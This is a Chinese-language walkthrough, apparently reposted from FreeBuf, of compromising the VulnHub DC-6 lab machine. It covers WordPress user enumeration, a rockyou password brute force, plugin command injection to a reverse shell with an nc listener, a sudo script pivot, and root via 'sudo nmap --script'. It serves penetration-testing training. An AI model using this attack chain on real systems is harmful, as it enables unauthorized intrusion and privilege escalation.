vulnhub之DC-6靶机渗透详细过程
2022-1-28 00:9:36 Author: www.freebuf.com(查看原文) 阅读量:8 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

nmap 192.168.26.0/24

nmap 扫C段发现靶机IP为192.168.26.134

访问80端口,发现无法解析,且自动跳转到 wordy,于是修改/etc/hosts文件,添加 192.168.26.134 wordy 并保存。

再次访问80端口,发现可以正常解析,并且是一个wordpress站点,于是尝试使用wpscan枚举用户名。

wpscan --url http://wordy/ -e u

图片.png

成功获取到了5个用户名,将这个五个用户名保存成dc6username.txt,根据网页的提示,将/usr/share/wordlists/rockyou.txt作为密码字典进行爆破。

图片.png

wpscan --url http://wordy/ -U dc6username.txt -P /usr/share/wordlists/rockyou.txt

这里注意如果之前没有解压过rockyou这个文件,它将是一个压缩文件,可以使用下面这条命令解压后再用上面的命令进行爆破。

gz -dk rockyou.txt.gz

爆破成功得到了mark用户的密码:helpdesk01 然后登录后台,发现了一个wp组件。

图片.png

然后搜索发现该组件有漏洞,

图片.png

读取该文件,

cat /usr/share/exploitdb/exploits/php/webapps/45274.html

根据该文件的提示,发现可以在该页面输入ip,点lookup提交,使用burp抓包修改命令实现反弹shell。

图片.png

首先在kali监听4444端口,然后放包即可getshell。

nc -lvnp  4444

图片.png

getshell后进行进一步的操作,

python -c 'import pty;pty.spawn("/bin/bash")'   #优化终端界面,便于操作

然后进入mark的家目录,一番寻找后找到了graham用户的密码。

图片.png

然后我们尝试用ssh登录该用户,

ssh   [email protected]

图片.png

成功登录该账户,

使用sudo -l查看可用命令,发现可以以jens用户运行一个脚本且不需要密码。

图片.png

9.修改一下脚本,然后以jens的身份执行,获取jens的shell。

sudo -u  jens  ./backups.sh

图片.png

图片.png

获取到jens的shell后我们使用sudo -l命令发现我们可以不用密码就能以root权限运行nmap。

图片.png

然后我们可以利用nmap来提权。

echo 'os.execute("/bin/bash")' > shell      #写一个脚本,调用系统命令执行/bin/bash
sudo nmap --script=shell

由于我们可以以root权限 运行nmap,然后我们让nmap去执行这个shell脚本,从而获取到一个root权限的shell。

图片.png

图片.png

我们可以看到提权成功并且获取到了最终的flag。

总结:

  1. 由于是wordpress站点,所以首先扫描用户;

  2. 根据提示生成针对性字典,爆破出用户名密码;

  3. 登录wp后台,寻找漏洞并利用以getshell;

  4. 再getshell以后仔细发现用户家目录下的有用文件以及可用命令,用以提升权限。


文章来源: https://www.freebuf.com/articles/web/321057.html
如有侵权请联系:admin#unsafe.sh